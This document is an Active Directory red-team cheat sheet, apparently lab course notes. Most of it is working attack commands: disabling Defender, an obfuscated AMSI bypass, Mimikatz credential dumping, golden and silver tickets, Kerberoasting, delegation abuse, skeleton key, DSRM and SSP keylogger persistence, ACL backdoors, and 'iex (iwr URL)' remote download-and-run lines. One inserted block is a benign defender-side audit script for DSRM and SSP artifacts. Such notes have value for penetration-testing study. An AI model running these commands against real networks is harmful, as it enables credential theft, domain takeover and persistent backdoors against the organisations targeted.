Glossary
Security bypass
Policy bypass
Disable Defender
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -DisablePrivacyMode $true
AMSI Bypass
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))[ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -eq 1))
Run after each ticket forge
klist
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<DomainControllerName> /user:<username> /ntlm:<CapturedValue> /run:powershell.exe"'
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<DOMAINNAMEFQDN> /sid:<Domain SID> /krbtgt:<RC4 NTLM HASH> /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DOMAINNAMEFQDN> /sid:<Domain SID> /target:<server FQDN> /service:<ServiceName> /rc4:<RC4 NTLM HASH> /User:Administrator /ptt"'
Invoke-Mimikatz -Command '"kerberos::ptt <TicketFilePath>"'
Download File
iex (iwr URL)
Enumeration
Local Privs Escalation
Current Domain where current user has local admin access
Find-LocalAdminAccess -Verbose
Invoke-CheckLocalAdminAccess
In case RPC and SMB are blocked
Find-WMILocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess.ps1
Invoke-EnumerateLocalAdmin -Verbose
Local admin on non-Domain-Controller machines: Get-NetComputer then Get-NetLocalGroup
Hunting session for domain admins
Invoke-UserHunter Invoke-UserHunter -Stealth
Hunting Group Users sessions
Invoke-UserHunter -GroupName "<GroupName>"
Confirm Admin Access
Invoke-UserHunter -CheckAccess
List unquoted paths
Get-ServiceUnquoted -Verbose
Current user can write to binary path
Get-ModifiableServiceFile -Verbose
Get services whose configuration can be modified by the current user
Get-ModifiableService -Verbose
BloodHound Exec
Invoke-BloodHound -CollectionMethod All
Then
Invoke-BloodHound -CollectionMethod All -ExcludeDC
Remote command Execution
$sess = New-PSSession -ComputerName Server1
Invoke-Command -Session $sess -ScriptBlock {$proc = Get-Process}
Invoke-Command -Session $sess -FilePath C:\AD\Tools\XX.ps1
Invoke-Command -Session $sess -ScriptBlock {$proc.Name}
Enter-PSSession -Session $sess
Run on Multiple Machines
Invoke-Command -FilePath C:\DDFDF.ps1 -ComputerName (Get-Content ServerList.File)
Privs Escalation
1️⃣ Kerberoast : offline cracking of TGS hashes
💁 Offline password cracking : save the ticket to disk and try to decrypt it offline
💡 ServicePrincipalName is not null if the account is a service account
Search for Services Accounts
Powerview
Get-NetUser -SPN
AD module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
1️⃣ 1️⃣ Request a TGS
AD Module
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <ServicePrincipalName>
klist
Export Ticket to the Disk
Invoke-Mimikatz -Command '"kerberos::list /export"'
Cracking
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt <ticket.kirbi path>
Powerview
Request-SPNTicket
1️⃣2️⃣ Kerberos PreAuth Disabled
💁 Grab users with a crackable AS-REP, then brute-force them
💁 GenericWrite and GenericAll are sufficient to disable Kerberos preauth
Force disable Kerberos PreAuth
PowerView_dev
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match <groupname>}
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Get-DomainUser -PreAuthNotRequired -Verbose
Enumerate users with PreAuth disabled
PowerView
Get-DomainUser -PreauthNotRequired -Verbose
AD Module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Exploit {Request encrypted AS-REP for offline bruteforce}
ASREPRoast fetch hashes
. .\ASREPRoast.ps1
Get-ASREPHash -UserName <username> -Verbose
Enumerate and bring AS-REP in 1️⃣ step
Invoke-ASREPRoast -Verbose
JohnTheRipper Cracking password
./john <HashFilePath> --wordlist=wordlist.txt
1️⃣3️⃣ TGS Kerberoasted using SPN
💁 GenericWrite and GenericAll are sufficient to set the target user's SPN to a custom value
💁 Machine names and SPN names are unique across the domain
Enumeration
PowerView_Dev
Look for GenericAll and/or GenericWrite permissions
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match <groupname>}
Check User SPN value
Get-DomainUser -Identity <username> | select ServicePrincipalName
AD Module
Get-ADUser -Identity <username> -Properties ServicePrincipalName | select ServicePrincipalName
Exploit
Set SPN Value
Powerview Dev
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='<machinename/SPNname>'}
AD Module
Set-ADUser -Identity <username> -ServicePrincipalNames @{Add='<Machinename/SPNName>'}
Request Service Ticket
AD module
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<MachineName/SPNName>"
klist
Invoke-Mimikatz -Command '"kerberos::list /export"'
PowerView_Dev
Request-SPNTicket
Crack Password offline
python tgsrepcrack.py WordlistDict.txt <TicketName>
2️⃣ Kerberos Delegation : re-use end-user credentials to access resources hosted on a different server
💁 The service account must be trusted for delegation to be able to make requests as a user.
💁 A mechanism is required to impersonate the incoming user and authenticate to the second-hop server.
2️⃣ 1️⃣ Unconstrained Delegation -- double-hop Kerberos
💁 Allows access to any service on any computer in the domain
💁 The user presents the TGT inside the TGS to the first server's service
💁 The DC makes sure that the TGT's account owner is not marked as sensitive and cannot be delegated
💁 If unconstrained delegation is enabled, the TGT is extracted from the TGS and stored in LSASS; that is how the server can reuse the user's TGT to access any other resource
🚨 Compromise a machine with unconstrained delegation, and a Domain Admin connects to that machine
Enumerate Domain computer with unconstrained delegation
PowerView
Get-NetComputer -Unconstrained
Active Directory Module
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
Compromise The Machine
Extract Domain Admin Tokens
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Cron Job Watching logon
Invoke-UserHunter -ComputerName <ServerName> -Poll 100 -UserName <UserName> -Delay 5 -Verbose
Exploit
Reuse TGT ticket
Invoke-Mimikatz -Command '"kerberos::ptt <tgtFilePath>"'
ls \\dcorp-dc.dollarcorp.moneycorp.local\C$
2️⃣ 2️⃣ Constrained Delegation
💁 Requests only to specified services on specified computers;
💡 The user account is not blocked for delegation
💡 Abuse condition : with access to the service account, it is possible to access the services listed in msDS-AllowedToDelegateTo
ℹ️ If the user does not use Kerberos authentication to authenticate to the first-hop server, Windows offers protocol transition to transition the request to Kerberos
📖 The user authenticates to a web service without Kerberos, and the web service makes requests to a database server, fetching results based on the user's authorization.
Service for User to Self (S4U2self) : allows a service to obtain a forwardable TGS to itself on behalf of a user with just the user's principal name.
💁 The service account must have the TRUSTED_TO_AUTH_FOR_DELEGATION (T2A4D) UserAccountControl attribute
Service for User to Proxy (S4U2proxy) : allows a service to obtain a TGS to a second service on behalf of a user
💁 This is controlled by the msDS-AllowedToDelegateTo attribute, which contains a list of SPNs to which user tokens can be forwarded
Exploit
1️⃣ Enumerate users and computers with constrained delegation enabled
Powerview_dev
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties *
2️⃣ Impersonation
💁 Either the plaintext password or the NTLM hash is required
kekeo# tgt::ask /user:<ServiceUserName> /domain:<domainFQDN> /rc4:<NTLMHash>
kekeo# tgs::s4u /tgt:<TGTFilePath> /user:Administrator@<DomainFQDN> /service:<cifs/machinename.DomainFQDN>
Inject Ticket to PTT
Invoke-Mimikatz -Command '"kerberos::ptt <TicketFilePath>"'
klist
ls \\MachineName.DomainFQDN\C$
💡 Abusing other services running under the same account is also possible because there is no SPN validation
👀 Having the NTLM hash of a machine that has delegation enabled allows you to compromise the machine
kekeo# tgt::ask /user:<machineName>$ /domain:<DomainFQDN> /rc4:<MachineNTLMHash>
kekeo# tgs::s4u /tgt:<TGTFilePath> /user:Administrator@<DomainFQDN> /service:<serviceName/DomainFQDN>|<serviceName/DomainFQDN>
Persistence -- Mimikatz to the rescue:
1️⃣ Dump Creds
1️⃣ 🅰️ Invoke-Mimikatz -DumpCreds
2️⃣ KRBTGT
Get krbtgt from the DC as Domain Admin
2️⃣ 🅱️ Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
3️⃣ DCSync attack to extract krbtgt using Domain Admin privs
3️⃣ 🅰️ Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DOMAINNAME>\krbtgt"'
4️⃣ Golden Ticket -- the krbtgt NTLM hash is the encryption key (TGS)
Forge a ticket from any machine
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<DOMAINNAMEFQDN> /sid:<Domain SID> /krbtgt:<RC4 NTLM HASH> /ptt"'
Clone someone's ticket
4️⃣ 🅰️ Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:<domainName> /ntlm:<hash> /run:powershell.exe"'
5️⃣ Silver Tickets -- the service account NTLM hash is the encryption key (TGS)
Dump Services RC4 {RID:1000, User:DCORP-DC$}
5️⃣ 🅰️ Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
5️⃣ 🅱️ Invoke-Mimikatz -Command '"kerberos::golden /domain:<DOMAINNAMEFQDN> /sid:<Domain SID> /target:<server FQDN> /service:<ServiceName> /rc4:<RC4 NTLM HASH> /User:Administrator /ptt"'
ℹ️ host -> to create scheduled tasks; cifs -> to browse the file system
Use Silver Ticket to run task
schtasks /create /S <DomainName> /SC Weekly /RU "NT Authority\SYSTEM" /TN "<TaskName>" /TR "<Task action>"
e.g. /TR "powershell.exe -c 'iex(iwr URL)'"
Run Task
schtasks /Run /S <DomainName> /TN "TASKNAME"
6️⃣ Skeleton Key -- patch LSASS by injecting a skeleton key to access any resource (Password: mimikatz); lasts until the DC is rebooted
Domain Admin is required
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DomainNameFQDN>
Then
Enter-PSSession -ComputerName <DomainController> -Credential <domain>\Administrator
Protected LSASS -- copy mimidriv.sys onto the target's hard disk
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-
7️⃣ DSRM -- Directory Services Restore Mode, the safe mode of any domain controller; the SafeModePassword is rarely changed
ℹ️ Local Administrator's password on the DC (different from RID:500)
🚨 Domain Admin Access Required
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <DomainControllerFQDN>
Then change the logon behavior of the local admin account by adding a registry value
Enter-PSSession -ComputerName <DomainControllerFQDN>
Then
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
Validate Changes
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"
Then you can use the following command to gain access
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<DomainControllerName> /user:Administrator /ntlm:<CapturedValuePreviously> /run:powershell.exe"'
Access Directory
ls \\domainControllerName\C$
8️⃣ Security Support Provider -- a DLL that allows an application to obtain an authenticated connection
Supported SSP packages are NTLM, Kerberos, Wdigest, CredSSP
mimilib.dll is a custom SSP that acts as a keylogger, logging account passwords in clear text on the target server
🅰️ Injecting into LSASS -- not stable
Invoke-Mimikatz -Command '"misc::memssp"'
🅱️ Drop mimilib.dll in System32, then add the registry value
$package = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$package += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $package
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $package
🚨 Logs @ C:\Windows\System32\kiwissp.log
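Defender-side check for the persistence artifacts of the DSRM and SSP sections above (DsrmAdminLogonBehavior, unexpected entries in 'Security Packages', kiwissp.log). This is an added audit example, not code from the original notes; it assumes it runs locally on the DC with admin rights, and $ExpectedPackages is an assumed baseline you should replace with your own documented SSP list.

```powershell
# Added defender-side audit (example, not part of the original notes).
# Assumption: run locally on a domain controller with local admin rights.
# Checks the persistence artifacts from the DSRM and SSP sections above.

$Findings = @()
$LsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

# DSRM: DsrmAdminLogonBehavior should be absent or 0; 1 or 2 lets the
# DSRM account log on while the DC is running normally.
$Dsrm = (Get-ItemProperty -Path $LsaKey -Name 'DsrmAdminLogonBehavior' `
            -ErrorAction SilentlyContinue).DsrmAdminLogonBehavior
if ($null -ne $Dsrm -and $Dsrm -ne 0) {
    $Findings += "DsrmAdminLogonBehavior = $Dsrm (DSRM admin can log on outside safe mode)"
}

# SSP: every name in 'Security Packages' (REG_MULTI_SZ) under Lsa and
# Lsa\OSConfig must be on your baseline. The list below is an assumed
# baseline for a current DC; replace it with what you have documented.
$ExpectedPackages = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap')
foreach ($Key in @($LsaKey, "$LsaKey\OSConfig")) {
    $Packages = (Get-ItemProperty -Path $Key -Name 'Security Packages' `
                    -ErrorAction SilentlyContinue).'Security Packages'
    foreach ($Pkg in @($Packages)) {
        # The default value on recent builds is the literal string ""; skip it.
        if (-not $Pkg -or $Pkg -eq '""') { continue }
        if ($ExpectedPackages -notcontains $Pkg.ToLower()) {
            $Findings += "Unexpected SSP '$Pkg' registered under $Key"
        }
    }
}

# SSP: mimilib writes captured logons to kiwissp.log in System32.
$LogPath = Join-Path $env:SystemRoot 'System32\kiwissp.log'
if (Test-Path -Path $LogPath) {
    $Findings += "SSP keylogger output present at $LogPath"
}

if ($Findings.Count -eq 0) {
    Write-Output 'No DSRM/SSP persistence indicators found.'
} else {
    $Findings | ForEach-Object { Write-Output "ALERT: $_" }
}
```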
9️⃣ ACLs
9️⃣ 🅰️ AdminSDHolder : controls the permissions of protected groups using an ACL [static ACL values]
Security Descriptor Propagator (SDPROP) runs every hour and overwrites the object ACL by comparing the ACL of protected groups and their members with the ACL of AdminSDHolder
ℹ️ Adding your account to the AdminSDHolder ACL gives persistence
Add Full Permission for a user in AdminSDHolder
Need Domain Admin 🚨 privs to execute 👇
PowerView
Add-ObjectACL -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName <YOUR account> -Rights All -Verbose
Active Directory Module
1️⃣ Import-Module Microsoft.ActiveDirectory.Management.dll
2️⃣ Import-Module ActiveDirectory.psd1
3️⃣ Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Principal <accountName> -Verbose
4️⃣ Run Propagator
$sess = New-PSSession -ComputerName DomainDC
Invoke-Command -FilePath .\Invoke-SDPropagator.ps1 -Session $sess
Enter-PSSession -Session $sess
Invoke-SDPropagator -showProgress -timeoutMinutes 1
5️⃣ Validate ACL
. .\PowerView.ps1
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match '<accountName>'}
6️⃣ Abuse it
Add Member to Group
AD Module
Add-ADGroupMember -Identity 'Domain Admins' -Members <AccountName>
PowerView_dev
Add-DomainGroupMember -Identity 'Domain Admins' -Members <AccountName> -Verbose
Verify
Get-ADUser -Identity <AccountName>
Get-ADGroupMember -Identity 'Domain Admins'
Reset Account Password
AD Module
Set-ADAccountPassword -Identity <AccountName> -NewPassword (ConvertTo-SecureString 'PASSME#!0rd' -AsPlainText -Force) -Verbose
PowerView_dev
Set-DomainUserPassword -Identity <AccountName> -AccountPassword (ConvertTo-SecureString 'P@ssw0rdM3!' -AsPlainText -Force) -Verbose
9️⃣ 🅱️ Domain Object ACL
9️⃣ 🅱️ 1️⃣ PowerView_dev
Add-ObjectACL -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName <AccountName> -Rights All -Verbose
OR add DCSync rights only
Add-ObjectACL -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName <AccountName> -Rights DCSync -Verbose
9️⃣ 🅱️ 2️⃣ AD Module
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal <accountName> -Verbose
OR add DCSync rights only
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal <accountName> -GUIDRight DCSync -Verbose
9️⃣ 🅱️ 🏃 Abuse
🅰️ Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\Administrator"'
🅱️ Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
9️⃣ C Modify the security descriptors of multiple remote access methods
ℹ️ Domain Administrator privileges are required
💡 Security Descriptor Definition Language (SDDL) uses ACE strings
💁 ACE for the built-in Administrator on the WMI namespace
A;CI;CCDCLCSWRPWPRCWD;;;SID
💡 Two points of interest here are : the COM Security component ACL in Component Services, and the namespace ACL (including sub-namespaces) in Computer Management
Test Payload
Get-WmiObject -Class win32_operatingsystem -ComputerName <domainFQDN>
ACL modification
. .\Set-RemoteWMI.ps1
Add permissions - Run on Local Machine
Set-RemoteWMI -UserName <username> -Verbose
Add permissions - Run on remote machine
Set-RemoteWMI -UserName <username> -ComputerName <computerName> -namespace 'root\cimv2' -Verbose
Add permissions - Run on remote machine with specific credentials
Set-RemoteWMI -UserName <username> -ComputerName <computerName> -namespace 'root\cimv2' -Credential Administrator -Verbose
Remove permissions remotely
Set-RemoteWMI -UserName <username> -ComputerName <computerName> -namespace 'root\cimv2' -Remove -Verbose
Execute Remote Command using PS session
. .\Set-RemotePSRemoting.ps1
Set-RemotePSRemoting -UserName <username> -ComputerName <domainFQDN> -Verbose
Validation command
Invoke-Command -ScriptBlock {whoami;} -ComputerName <DCFQDN>
Remote Registry modification
Use DAMP with admin privs on the remote machine
. .\Add-RemoteRegBackdoor.ps1
Add-RemoteRegBackdoor -ComputerName <computerName> -Trustee <username> -Verbose
Abuse
💁 replace $IV by $initIV
. .\RemoteHashRetrieval.ps1
Retrieve machine account hash
Get-RemoteMachineAccountHash -ComputerName <computerName> -Verbose
Retrieve local account hash -- DSRM password in case ComputerName is a Domain Controller
Get-RemoteLocalAccountHash -ComputerName <computerName> -Verbose
Retrieve domain cached credentials
Get-RemoteCachedCredential -ComputerName <computerName> -Verbose
Scripts
Powerup Tutorial
https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
Jenkins
RCE Exec in scripts
http://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html
Building Job
http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html
http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html
DCInternal
https://www.ultimatewindowssecurity.com/blog/default.aspx?d=10/2017